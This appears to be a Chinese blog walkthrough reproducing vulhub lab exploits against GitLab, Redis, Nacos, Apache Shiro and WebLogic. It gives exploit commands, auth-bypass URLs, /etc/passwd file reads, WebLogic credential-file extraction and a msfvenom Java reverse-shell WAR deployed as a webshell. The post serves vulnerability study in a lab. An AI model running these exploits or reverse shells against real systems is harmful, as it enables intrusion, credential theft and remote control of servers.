Gitlab、Redis、Nacos、Apache Shiro、Gitlab、weblogic相关漏洞

PT_silver2024-05-15 9:33

文章目录

一、Gitlab远程代码执行(CVE-2021-22205)

sh 复制代码 
docker-compose up -d # 开启容器

直接使用该脚本poc.py,命令如下:

sh 复制代码 
python poc.py http://192.168.92.6:8080 "touch /tmp/success"

二、Redis主从复制远程命令执行

sh 复制代码 
docker-compose up -d # 开启容器
redis-cli -h 127.0.0.1 # 连接redis数据库,会发现未授权


redis-rogue-getshel

sh 复制代码 
python redis-master.py -r 192.168.92.6 -p 6379 -L 192.168.92.6 -P 8888 -f RedisModulesSDK/exp.so -c "id"

三、Nacos认证绕过漏洞(CVE-2021-29441)

如果nacos服务没有启动,可以使用docker-compose restart nacos

  1. 访问http://127.0.0.1:8848/nacos/v1/auth/users?pageNo=1&pageSize=10可以查看用户名和密码,注意:User-Agent: Nacos-Server
  2. 添加新用户http://127.0.0.1:8848/nacos/v1/auth/users?username=vulhub&password=vulhub,注意:POST数据包。
  3. 登录Nacoshttp://127.0.0.1:8848/nacos#login

四、Apache Shiro认证绕过漏洞(CVE-2020-1957)

Apache Shiro是一款开源安全框架,提供身份验证、授权、密码学和会话管理。

访问192.168.92.16:8080/admin/,显示302跳转

构造恶意路径,访问192.168.92.16:8080/xxx/..;/admin/,可绕过权限校验,访问到管理页面:

五、Gitlab任意文件读取漏洞(CVE-2016-9086)

访问192.168.92.16:8080,用户名为root,密码为vulhub123456。


在导入页面,将test.tar.gz上传,将会读取到/etc/passwd文件内容:

六、weblogic文件读取漏洞

1、弱口令

访问192.168.92.6:7001/console,用户名为weblogic,密码为Oracle@123。

常见弱口令

2、任意文件读取漏洞

访问192.168.92.6:7001/hello/file.jsp?path=/etc/passwd,实现任意文件下载。

3、读取后台用户密文与密钥文件

weblogic密码使用AES(老版本3DES)加密,对称加密可解密,只需要找到用户的密文与加密时的密钥即可。这两个文件均位于base_domain下,名为SerializedSystemIni.datconfig.xml,在本环境中为./security/SerializedSystemIni.dat./config/config.xml

复制代码 
`SerializedSystemIni.dat`是一个二进制文件,所以一定要用burpsuite来读取,用浏览器直接下载可能引入一些干扰字符。在burp里选中读取到的那一串乱码,右键`copy to file`就可以保存成一个文件:


config.xml是base_domain的全局配置文件,所以乱七八糟的内容比较多,找到其中的<node-manager-password-encrypted>的值,即为加密后的管理员密码:

注意:

  1. 在保存这个test.dat时,最好在HEX模式下进行复制。不然可能回报这个错:Null input buffer
  2. 如果报错:PBEWITHSHAAND128BITRC2-CBC SecretKeyFactory not available,需要手动下载bcprov-jdk15on-1.56.jar,并放在<java目录>/jre/lib/ext/目录下。

4、后台上传webshell


使用msfvenom生成war包的反弹shell

sh 复制代码 
msfvenom -p java/shell_reverse_tcp LHOST=192.168.92.6 LPORT=4444 -f war -o shell.war

然后疯狂下一步,直到完成。点击我们刚刚部署的war包,然后启动即可获取反弹shell。

相关推荐
cfm_29146 小时前
Redis五大基本数据结构底层了解
数据结构·数据库·redis
真实的菜7 小时前
Redis 从入门到精通(十二):典型业务场景实战 —— 排行榜、限流器、秒杀系统、Session 共享
数据库·redis·python
x***r15111 小时前
Redis Desktop Manager 0.8.8 安装教程(Windows redis-desktop-manager-0.8.8.384详细步骤)
数据库·windows·redis
无涯大者12 小时前
Redis 实现页面缓存、购物车、登录 token示例、点赞 / 阅读计数,排行榜 示例
redis·缓存
真实的菜13 小时前
Redis 从入门到精通(十三):性能优化与运维实战 —— 慢查询、内存优化、监控与安全
运维·redis·性能优化
就叫_这个吧16 小时前
servlet整合tomcat项目启动报错解决,org.apache.tomcat.util.descriptor.web.WebXml.setVersion
java·servlet·tomcat·apache
Java 码思客16 小时前
【Redis分布式缓存实战】第20章 Redis监控运维与自动化体系
运维·redis·缓存
勇往直前plus16 小时前
Redis&Python 梳理
数据库·redis·python
我是一颗柠檬16 小时前
【Java项目技术亮点】分布式锁实现与优化:从Redisson到ZooKeeper,彻底搞懂分布式锁的底层原理
java·redis·分布式·中间件·java-zookeeper
独隅18 小时前
Git/GitHub/GitLab/Gitee 核心对比指南
git·gitlab·github
热门推荐
01GitHub 镜像站点02【AI】2026 年具身智能模型和世界模型总结03Codex 下载安装指南:Windows 和 macOS 官方版下载042026 年 AI 编程工具终极横评:Cursor vs Claude Code vs Copilot vs Windsurf052026 AI 编程工具终极实战指南:Cursor vs Claude Code vs Copilot,开发者该怎么选?06【踩坑记录 | 第一篇】微软商店无法使用时,如何手动安装 OpenAI Codex?附`.msix`文件系统错误解决方法07CC-Switch 下载、安装与使用配置指南【2026.5.29】08Agnes AI 全模态 API 免费实测报告:文生图 + 文生视频完整测试09CC-Switch & Claude 基于 Linux 服务器安装使用指南10AI科技热点日报 | 2026年6月1日